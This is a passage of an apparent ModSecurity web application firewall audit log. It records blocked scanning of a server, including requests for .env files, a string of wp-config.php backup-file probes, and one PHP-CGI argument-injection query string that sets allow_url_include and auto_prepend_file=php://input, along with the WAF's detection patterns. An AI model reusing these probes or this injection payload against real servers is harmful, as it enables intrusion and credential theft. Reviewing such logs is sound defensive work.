"Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744915898580581 913 (- - -) Stopwatch2: 1744915898580581 913; combined=330, p1=287, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71dbe304-Z-- --7b1c4f14-A-- [18/Apr/2025:03:04:14 +0700] aAFevj2cuLCXMl1vWbDFlAAAAA8 103.236.140.4 56994 103.236.140.4 8181 --7b1c4f14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --7b1c4f14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b1c4f14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744920254974630 747 (- - -) Stopwatch2: 1744920254974630 747; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b1c4f14-Z-- --394ba828-A-- [18/Apr/2025:03:16:33 +0700] aAFhoT2cuLCXMl1vWbDIwgAAAAI 103.236.140.4 39924 103.236.140.4 8181 --394ba828-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --394ba828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --394ba828-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744920993756490 774 (- - -) Stopwatch2: 1744920993756490 774; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --394ba828-Z-- --a6c58847-A-- [18/Apr/2025:04:29:14 +0700] aAFyqhk6uTiIdxrJEESvSAAAANc 103.236.140.4 41400 103.236.140.4 8181 --a6c58847-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.253.92.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.253.92.249 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --a6c58847-C-- â³googlecom --a6c58847-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c58847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744925354939255 12852 (- - -) Stopwatch2: 1744925354939255 12852; combined=10877, p1=1749, p2=8657, p3=160, p4=257, p5=54, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c58847-Z-- --0dc99d7e-A-- [18/Apr/2025:04:48:55 +0700] aAF3R1yj-eUTITfvHEUYmgAAABg 103.236.140.4 45710 103.236.140.4 8181 --0dc99d7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.95.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.95.9 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0dc99d7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dc99d7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744926535257930 932 (- - -) Stopwatch2: 1744926535257930 932; combined=440, p1=400, p2=0, p3=0, p4=0, p5=40, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dc99d7e-Z-- --addd331d-A-- [18/Apr/2025:06:45:56 +0700] aAGStDpR4B6O-aqWibPN9QAAAIw 103.236.140.4 43172 103.236.140.4 8181 --addd331d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --addd331d-C-- --addd331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addd331d-E-- --addd331d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744933556156906 6614 (- - -) Stopwatch2: 1744933556156906 6614; combined=5022, p1=485, p2=4502, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addd331d-Z-- --e171c35c-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDAAAAEo 103.236.140.4 52328 103.236.140.4 8181 --e171c35c-B-- GET /wp-config.php_ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* --e171c35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e171c35c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778628850 834 (- - -) Stopwatch2: 1744935778628850 834; combined=302, p1=263, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e171c35c-Z-- --5e3bad27-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDQAAAEU 103.236.140.4 52330 103.236.140.4 8181 --5e3bad27-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: */* --5e3bad27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e3bad27-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778661461 655 (- - -) Stopwatch2: 1744935778661461 655; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e3bad27-Z-- --bf0beb65-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDgAAAE0 103.236.140.4 52332 103.236.140.4 8181 --bf0beb65-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --bf0beb65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf0beb65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778693344 722 (- - -) Stopwatch2: 1744935778693344 722; combined=304, p1=273, p2=0, p3=0, p4=0, p5=31, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf0beb65-Z-- --5ff0341d-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDwAAAE8 103.236.140.4 52334 103.236.140.4 8181 --5ff0341d-B-- GET /wp-config.php.war HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 Accept: */* --5ff0341d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff0341d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778729379 703 (- - -) Stopwatch2: 1744935778729379 703; combined=292, p1=261, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff0341d-Z-- --47029344-A-- [18/Apr/2025:07:22:58 +0700] aAGbYlyj-eUTITfvHEUkBwAAAAc 103.236.140.4 52336 103.236.140.4 8181 --47029344-B-- GET /wp-config.php.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36 Accept: */* --47029344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47029344-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778765035 728 (- - -) Stopwatch2: 1744935778765035 728; combined=301, p1=268, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47029344-Z-- --927bb068-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEAAAAFM 103.236.140.4 52338 103.236.140.4 8181 --927bb068-B-- GET /wp-config.php.saved HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/7.1.2 Safari/537.85.11 Accept: */* --927bb068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927bb068-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778802788 667 (- - -) Stopwatch2: 1744935778802788 667; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927bb068-Z-- --fa9e7608-A-- [18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4jwAAAM4 103.236.140.4 52340 103.236.140.4 8181 --fa9e7608-B-- GET /wp-config.inc HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept: */* --fa9e7608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa9e7608-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935778837759 2017 (- - -) Stopwatch2: 1744935778837759 2017; combined=793, p1=328, p2=439, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa9e7608-Z-- --22b4eb01-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQOwAAAJQ 103.236.140.4 52346 103.236.140.4 8181 --22b4eb01-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 Accept: */* --22b4eb01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22b4eb01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778876263 787 (- - -) Stopwatch2: 1744935778876263 787; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22b4eb01-Z-- --5c0ccd3f-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEQAAAEk 103.236.140.4 52348 103.236.140.4 8181 --5c0ccd3f-B-- GET /wp-config.php.tmp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Accept: */* --5c0ccd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c0ccd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778907492 853 (- - -) Stopwatch2: 1744935778907492 853; combined=384, p1=347, p2=0, p3=0, p4=0, p5=37, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c0ccd3f-Z-- --56694960-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQPAAAAJA 103.236.140.4 52350 103.236.140.4 8181 --56694960-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --56694960-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56694960-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778943730 642 (- - -) Stopwatch2: 1744935778943730 642; combined=252, p1=220, p2=0, p3=0, p4=0, p5=31, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56694960-Z-- --872cae09-A-- [18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4kAAAAM0 103.236.140.4 52352 103.236.140.4 8181 --872cae09-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Accept: */* --872cae09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --872cae09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778974864 662 (- - -) Stopwatch2: 1744935778974864 662; combined=267, p1=221, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872cae09-Z-- --f0a99838-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPQAAAJc 103.236.140.4 52354 103.236.140.4 8181 --f0a99838-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 [FBAN/FBIOS;FBAV/38.0.0.6.79;FBBV/14316658;FBDV/iPad4,1;FBMD/iPad;FBSN/iPhone OS;FBSV/8.4.1;FBSS/2; FBCR/;FBID/tablet;FBLC/en_US;FBOP/1] Accept: */* --f0a99838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0a99838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779007164 666 (- - -) Stopwatch2: 1744935779007164 666; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0a99838-Z-- --35234c18-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEgAAAEs 103.236.140.4 52356 103.236.140.4 8181 --35234c18-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept: */* --35234c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35234c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779037585 652 (- - -) Stopwatch2: 1744935779037585 652; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35234c18-Z-- --5063d87d-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPgAAAII 103.236.140.4 52358 103.236.140.4 8181 --5063d87d-B-- GET /wp-config.php.original HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko Accept: */* --5063d87d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5063d87d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file 